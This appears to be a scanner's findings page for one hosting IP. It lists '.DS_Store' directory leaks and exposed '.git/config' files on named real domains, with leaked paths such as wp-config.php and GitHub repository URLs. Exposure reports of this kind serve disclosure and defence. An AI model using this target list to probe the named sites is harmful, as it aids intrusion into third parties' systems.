.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: dinhomecom.papaconstantinou.com
Port: 443
URL: https://dinhomecom.papaconstantinou.comFirst seen 2022-09-19 17:37
Last seen 2024-06-18 07:36
Open for 637 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9b50509f2111030f6dd1b73f898496b87Found 5 files trough .DS_Store spidering: /_notes /feed back /Graphic artist /images /Register BTN
Found on 2024-06-18 07:36
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: maisondin-ca.papaconstantinou.com
Port: 443
URL: https://maisondin-ca.papaconstantinou.comFirst seen 2022-10-20 18:18
Last seen 2024-06-18 05:46
Open for 606 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814efa4e382f4ba6ab874f3a0e468067f85fFound 6 files trough .DS_Store spidering: /_notes /Din-Home_marketing_consultants /Din-Home_marketing_consultants/Photoshop /Din-Home_marketing_consultants/SpryAssets /images /SpryAssets
Found on 2024-06-18 05:46
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.omegamedia-ltd.siteplan.co.il
Port: 443
URL: https://www.omegamedia-ltd.siteplan.co.ilFirst seen 2022-08-28 17:39
Last seen 2024-06-18 04:23
Open for 659 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2024-06-18 04:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: lionsleather-ca.papaconstantinou.com
Port: 443
URL: https://lionsleather-ca.papaconstantinou.comFirst seen 2022-10-20 18:18
Last seen 2024-06-18 02:20
Open for 606 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bc5e74dd734213f79136acb1d242cea00cFound 22 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/images/inventory /history_company/posters /history_company/runway_models /history_company/runway_models/images /history_company/runway_models/images/inventory /history_company/runway_models/index.html /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-06-18 02:20 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54479d3e5762e8d68a1cd6c408c395158a08Found 18 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/posters /history_company/runway_models /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2023-09-13 21:40
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.lionsleather-ca.papaconstantinou.com
Port: 443
URL: https://www.lionsleather-ca.papaconstantinou.comFirst seen 2022-10-20 18:18
Last seen 2024-06-18 01:44
Open for 606 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bc5e74dd734213f79136acb1d242cea00cFound 22 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/images/inventory /history_company/posters /history_company/runway_models /history_company/runway_models/images /history_company/runway_models/images/inventory /history_company/runway_models/index.html /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-06-18 01:44 -
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35bb3a54e669e011f808ece00d7c7b1d6f9Found 14 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2022-10-20 18:18
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.dinhomecom.papaconstantinou.com
Port: 443
URL: https://www.dinhomecom.papaconstantinou.comFirst seen 2022-09-19 17:37
Last seen 2024-06-16 08:02
Open for 635 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9b50509f2111030f6dd1b73f898496b87Found 5 files trough .DS_Store spidering: /_notes /feed back /Graphic artist /images /Register BTN
Found on 2024-06-16 08:02
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.presslergroup.siteplan.co.il
Port: 443
URL: https://www.presslergroup.siteplan.co.ilFirst seen 2022-10-02 17:49
Last seen 2024-05-12 20:32
Open for 588 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2024-05-12 20:32
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: presslergroup.siteplan.co.il
Port: 443
URL: https://presslergroup.siteplan.co.ilFirst seen 2022-10-02 17:49
Last seen 2024-05-08 18:24
Open for 584 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2024-05-08 18:24
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.cxf.xah.mybluehost.me
Port: 443
URL: https://www.cxf.xah.mybluehost.meFirst seen 2024-04-22 01:05-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d28a25ad628a25ad628a25ad628a25ad6Found 1 files trough .DS_Store spidering: /.git
Found on 2024-04-22 01:05
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: mail.cxf.xah.mybluehost.me
Port: 443
URL: https://mail.cxf.xah.mybluehost.meFirst seen 2024-04-22 01:05-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d28a25ad628a25ad628a25ad628a25ad6Found 1 files trough .DS_Store spidering: /.git
Found on 2024-04-22 01:05
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-04-22 00:55-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d28a25ad628a25ad628a25ad628a25ad6Found 1 files trough .DS_Store spidering: /.git
Found on 2024-04-22 00:55
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-15 18:46
Last seen 2024-04-22 00:55
Open for 523 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d28a25ad628a25ad628a25ad628a25ad6Found 1 files trough .DS_Store spidering: /.git
Found on 2024-04-22 00:55
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2024-04-10 18:47
Open for 661 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a652209bb8362[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = git@github.com:justuseapen/talks.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2024-04-10 18:47244 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2024-04-10 17:19
Open for 660 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a652209bb8362[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = git@github.com:justuseapen/talks.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2024-04-10 17:19244 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2024-04-10 16:10
Open for 660 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a652209bb8362[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = git@github.com:justuseapen/talks.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2024-04-10 16:10244 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:03
Last seen 2024-04-10 16:10
Open for 660 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a652209bb8362[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = git@github.com:justuseapen/talks.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2024-04-10 16:10244 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2024-04-10 16:00
Open for 660 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a652209bb8362[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = git@github.com:justuseapen/talks.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2024-04-10 16:00244 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2024-03-21 11:22
Open for 640 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a652209bb8362[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = git@github.com:justuseapen/talks.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2024-03-21 11:22244 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.IP: 162.241.253.33
Domain: mail.ytx.gil.mybluehost.me
Port: 443
URL: https://mail.ytx.gil.mybluehost.meFirst seen 2022-06-17 17:47
Last seen 2024-02-02 22:32
Open for 595 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-02-02 22:32343 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: mail.turingtournament.com
Port: 443
URL: https://mail.turingtournament.comFirst seen 2023-02-19 19:35
Last seen 2023-12-24 09:04
Open for 307 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e94a7e0559075c565a94f88adbdd336cfdFound 5 files trough .DS_Store spidering: /css /fonts /images /js /upload
Found on 2023-12-24 09:04
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.IP: 162.241.253.33
Domain: mail.turingtournament.com
Port: 443
URL: https://mail.turingtournament.comFirst seen 2022-06-19 18:04
Last seen 2023-12-24 09:04
Open for 552 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522a28d6a7c[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = https://github.com/justuseapen/turing-lander.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Found on 2023-12-24 09:04318 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-20 18:31
Last seen 2023-12-24 03:51
Open for 306 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e94a7e0559075c565a94f88adbdd336cfdFound 5 files trough .DS_Store spidering: /css /fonts /images /js /upload
Found on 2023-12-24 03:51
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:03
Last seen 2023-12-24 03:51
Open for 552 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522a28d6a7c[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = https://github.com/justuseapen/turing-lander.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Found on 2023-12-24 03:51318 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-19 18:38
Last seen 2023-12-24 03:34
Open for 307 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e94a7e0559075c565a94f88adbdd336cfdFound 5 files trough .DS_Store spidering: /css /fonts /images /js /upload
Found on 2023-12-24 03:34
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2023-12-24 03:34
Open for 552 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522a28d6a7c[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = https://github.com/justuseapen/turing-lander.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Found on 2023-12-24 03:34318 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:03
Last seen 2023-12-24 03:31
Open for 552 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522a28d6a7c[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = https://github.com/justuseapen/turing-lander.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Found on 2023-12-24 03:31318 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-19 18:02
Last seen 2023-12-24 03:31
Open for 430 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e94a7e0559075c565a94f88adbdd336cfdFound 5 files trough .DS_Store spidering: /css /fonts /images /js /upload
Found on 2023-12-24 03:31
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2023-12-24 02:16
Open for 552 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522a28d6a7c[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = https://github.com/justuseapen/turing-lander.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Found on 2023-12-24 02:16318 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-19 18:02
Last seen 2023-12-24 02:16
Open for 430 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e94a7e0559075c565a94f88adbdd336cfdFound 5 files trough .DS_Store spidering: /css /fonts /images /js /upload
Found on 2023-12-24 02:16
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-20 18:31
Last seen 2023-12-24 00:05
Open for 306 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e94a7e0559075c565a94f88adbdd336cfdFound 5 files trough .DS_Store spidering: /css /fonts /images /js /upload
Found on 2023-12-24 00:05
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-19 18:04
Last seen 2023-12-24 00:05
Open for 552 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522a28d6a7c[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true [remote "origin"] url = https://github.com/justuseapen/turing-lander.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Found on 2023-12-24 00:05318 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-17 17:47
Last seen 2023-11-17 00:11
Open for 517 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2023-11-17 00:11343 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-17 17:47
Last seen 2023-11-16 18:48
Open for 517 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2023-11-16 18:48343 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-17 17:47
Last seen 2023-11-16 18:48
Open for 517 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2023-11-16 18:48343 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-20 18:13
Last seen 2023-09-23 04:36
Open for 459 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522ef5e1bd3[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = git@github.com:justuseapen/dream-butter-landing-page.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2022-06-20 18:13219 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-19 17:58
Last seen 2023-09-23 03:46
Open for 338 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2022-10-19 17:58
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:34
Last seen 2023-09-23 03:31
Open for 337 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-20 18:34
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-20 18:13
Last seen 2023-09-23 02:48
Open for 459 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522ef5e1bd3[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = git@github.com:justuseapen/dream-butter-landing-page.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2022-06-20 18:13219 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-20 18:13
Last seen 2023-09-23 02:45
Open for 459 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522ef5e1bd3[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = git@github.com:justuseapen/dream-butter-landing-page.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2022-06-20 18:13219 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: cuir-panda-leather.papaconstantinou.com
Port: 443
URL: https://cuir-panda-leather.papaconstantinou.comFirst seen 2022-10-19 17:58
Last seen 2023-09-22 21:45
Open for 338 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814e2e65bb97b363c985b81f17d9d482e563Found 6 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /images /Photoshop /SpryAssets
Found on 2022-12-31 18:55 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2022-10-19 17:58
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.cuir-panda-leather.papaconstantinou.com
Port: 443
URL: https://www.cuir-panda-leather.papaconstantinou.comFirst seen 2022-10-19 17:58
Last seen 2023-09-16 19:02
Open for 332 days-
Severity: low
